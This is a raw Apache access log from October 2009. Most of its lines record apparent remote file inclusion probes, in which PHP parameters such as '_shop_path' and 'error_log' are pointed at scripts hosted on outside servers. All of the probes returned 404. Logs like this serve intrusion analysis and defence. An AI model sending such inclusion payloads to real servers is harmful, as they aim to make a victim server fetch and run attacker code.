125.251.147.194 - - [17/Oct/2009:03:37:07 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
99.21.192.227 - - [17/Oct/2009:03:37:09 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://sn120w.snt120.mail.live.com/mail/InboxLight.aspx?n=1859632280" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30729; WinNT-PAR 27.06.2009; msn OptimizedIE8;ENUS)"
125.251.147.194 - - [17/Oct/2009:03:37:11 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:37:31 -0400] "GET ////skin/ggambo7002_board/bbs/private/server/logs/error_log=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:37:31 -0400] "GET /logs/access_log.Q109072200////skin/ggambo7002_board/bbs/private/server/logs/error_log=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 348 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:37:31 -0400] "GET /logs////skin/ggambo7002_board/bbs/private/server/logs/error_log=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
